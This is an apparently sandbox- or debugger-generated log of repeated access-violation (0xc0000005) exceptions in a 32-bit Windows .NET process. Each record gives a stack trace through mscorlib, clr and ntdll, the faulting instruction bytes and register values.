mscorlib+0x2cb060 @ 0x6de2b060
0x6bb029b
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x34b13b @ 0x6deab13b
mscorlib+0x30d3a5 @ 0x6de6d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x6ed0f1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x6ed0f164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 e8 d2 aa dd 66 8b d0 b9 b0 af f5 6d e8 3e
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6ff605f
registers.esp: 108255660
registers.edi: 45752236
registers.eax: 43331156
registers.ebp: 108260096
registers.edx: 43331156
registers.ebx: 45271072
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x6bb5989
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6ec02652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6ec81838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6ec81737
mscorlib+0x2d36ad @ 0x6de336ad
mscorlib+0x308f2d @ 0x6de68f2d
mscorlib+0x2cb060 @ 0x6de2b060
0x6bb029b
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x34b13b @ 0x6deab13b
mscorlib+0x30d3a5 @ 0x6de6d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x6ed0f1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x6ed0f164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 78 04 b9 50 b3 f5 6d e8 8e bc 9b f9 8d 56 10
exception.instruction: mov edi, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6ff6439
registers.esp: 87943532
registers.edi: 48948592
registers.eax: 0
registers.ebp: 87943644
registers.edx: 117423053
registers.ebx: 47360668
registers.esi: 47162372
registers.ecx: 9406364
1 0 0

__exception__

stacktrace:
0x6ff6433
0x6bb5989
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6ec02652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6ec81838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6ec81737
mscorlib+0x2d36ad @ 0x6de336ad
mscorlib+0x308f2d @ 0x6de68f2d
mscorlib+0x2cb060 @ 0x6de2b060
0x6bb029b
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x34b13b @ 0x6deab13b
mscorlib+0x30d3a5 @ 0x6de6d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x6ed0f1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x6ed0f164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 3b 42 04 7f 73 b9 50 44 2a 01 ba 6d 00 00 00 e8
exception.instruction: cmp eax, dword ptr [edx + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6ffa9e7
registers.esp: 87943408
registers.edi: 45317040
registers.eax: 0
registers.ebp: 87943524
registers.edx: 0
registers.ebx: 47360668
registers.esi: 87943408
registers.ecx: 45013968
1 0 0

__exception__

stacktrace:
0x6bb5989
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6ec02652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6ec81838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6ec81737
mscorlib+0x2d36ad @ 0x6de336ad
mscorlib+0x308f2d @ 0x6de68f2d
mscorlib+0x2cb060 @ 0x6de2b060
0x6bb029b
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x34b13b @ 0x6deab13b
mscorlib+0x30d3a5 @ 0x6de6d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x6ed0f1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x6ed0f164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 78 04 b9 50 b3 f5 6d e8 8e bc 9b f9 8d 56 10
exception.instruction: mov edi, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6ff6439
registers.esp: 87943532
registers.edi: 45317040
registers.eax: 0
registers.ebp: 87943644
registers.edx: 117419332
registers.ebx: 47360668
registers.esi: 45069776
registers.ecx: 9406364
1 0 0

__exception__

stacktrace:
0x6bb5989
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6ec02652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6ec81838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6ec81737
mscorlib+0x2d36ad @ 0x6de336ad
mscorlib+0x308f2d @ 0x6de68f2d
mscorlib+0x2cb060 @ 0x6de2b060
0x6bb029b
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x34b13b @ 0x6deab13b
mscorlib+0x30d3a5 @ 0x6de6d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x6ed0f1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x6ed0f164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 78 04 b9 50 b3 f5 6d e8 8e bc 9b f9 8d 56 10
exception.instruction: mov edi, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6ff6439
registers.esp: 87943532
registers.edi: 46007976
registers.eax: 0
registers.ebp: 87943644
registers.edx: 117423053
registers.ebx: 45031784
registers.esi: 45319088
registers.ecx: 9406364
1 0 0

__exception__

stacktrace:
0x6ff6433
0x6bb5989
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6ec02652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6ec81838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6ec81737
mscorlib+0x2d36ad @ 0x6de336ad
mscorlib+0x308f2d @ 0x6de68f2d
mscorlib+0x2cb060 @ 0x6de2b060
0x6bb029b
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x34b13b @ 0x6deab13b
mscorlib+0x30d3a5 @ 0x6de6d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x6ed0f1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x6ed0f164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 3b 42 04 7f 73 b9 50 44 2a 01 ba 6d 00 00 00 e8
exception.instruction: cmp eax, dword ptr [edx + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6ffa9e7
registers.esp: 87943408
registers.edi: 46707144
registers.eax: 0
registers.ebp: 87943524
registers.edx: 0
registers.ebx: 45031784
registers.esi: 87943408
registers.ecx: 45013968
1 0 0

__exception__

stacktrace:
0x6bb5989
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6ec02652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6ec81838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6ec81737
mscorlib+0x2d36ad @ 0x6de336ad
mscorlib+0x308f2d @ 0x6de68f2d
mscorlib+0x2cb060 @ 0x6de2b060
0x6bb029b
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x34b13b @ 0x6deab13b
mscorlib+0x30d3a5 @ 0x6de6d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x6ed0f1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x6ed0f164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 78 04 b9 50 b3 f5 6d e8 8e bc 9b f9 8d 56 10
exception.instruction: mov edi, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6ff6439
registers.esp: 87943532
registers.edi: 46707144
registers.eax: 0
registers.ebp: 87943644
registers.edx: 117419332
registers.ebx: 45031784
registers.esi: 46054744
registers.ecx: 9406364
1 0 0

__exception__

stacktrace:
0x6bb59ec
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6ec02652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6ec81838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6ec81737
mscorlib+0x2d36ad @ 0x6de336ad
mscorlib+0x308f2d @ 0x6de68f2d
mscorlib+0x2cb060 @ 0x6de2b060
0x6bb029b
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x34b13b @ 0x6deab13b
mscorlib+0x30d3a5 @ 0x6de6d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x6ed0f1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x6ed0f164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 78 04 b9 50 b3 f5 6d e8 2d 5e 9b f9 8d 56 0c
exception.instruction: mov edi, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6ffc29a
registers.esp: 87943528
registers.edi: 47031356
registers.eax: 0
registers.ebp: 87943644
registers.edx: 117423053
registers.ebx: 43031664
registers.esi: 47019724
registers.ecx: 9406364
1 0 0

__exception__

stacktrace:
0x6bb5c40
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6ec02652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6ec81838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6ec81737
mscorlib+0x2d36ad @ 0x6de336ad
mscorlib+0x308f2d @ 0x6de68f2d
mscorlib+0x2cb060 @ 0x6de2b060
0x6bb029b
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x34b13b @ 0x6deab13b
mscorlib+0x30d3a5 @ 0x6de6d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x6ed0f1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x6ed0f164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 78 04 b9 50 b3 f5 6d e8 7c 58 9b f9 8d 56 10
exception.instruction: mov edi, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6ffc84b
registers.esp: 87943528
registers.edi: 48334536
registers.eax: 0
registers.ebp: 87943640
registers.edx: 117423053
registers.ebx: 43031664
registers.esi: 47662660
registers.ecx: 9406364
1 0 0

__exception__

stacktrace:
0x6ffc845
0x6bb5c40
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6ec02652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6ec81838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6ec81737
mscorlib+0x2d36ad @ 0x6de336ad
mscorlib+0x308f2d @ 0x6de68f2d
mscorlib+0x2cb060 @ 0x6de2b060
0x6bb029b
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x34b13b @ 0x6deab13b
mscorlib+0x30d3a5 @ 0x6de6d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x6ed0f1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x6ed0f164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 3b 42 04 7f 73 b9 50 44 2a 01 ba 6d 00 00 00 e8
exception.instruction: cmp eax, dword ptr [edx + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6ffa9e7
registers.esp: 87943404
registers.edi: 49021824
registers.eax: 0
registers.ebp: 87943520
registers.edx: 0
registers.ebx: 43031664
registers.esi: 87943404
registers.ecx: 48357840
1 0 0

__exception__

stacktrace:
0x6bb5c40
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6ec02652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6ec81838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6ec81737
mscorlib+0x2d36ad @ 0x6de336ad
mscorlib+0x308f2d @ 0x6de68f2d
mscorlib+0x2cb060 @ 0x6de2b060
0x6bb029b
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
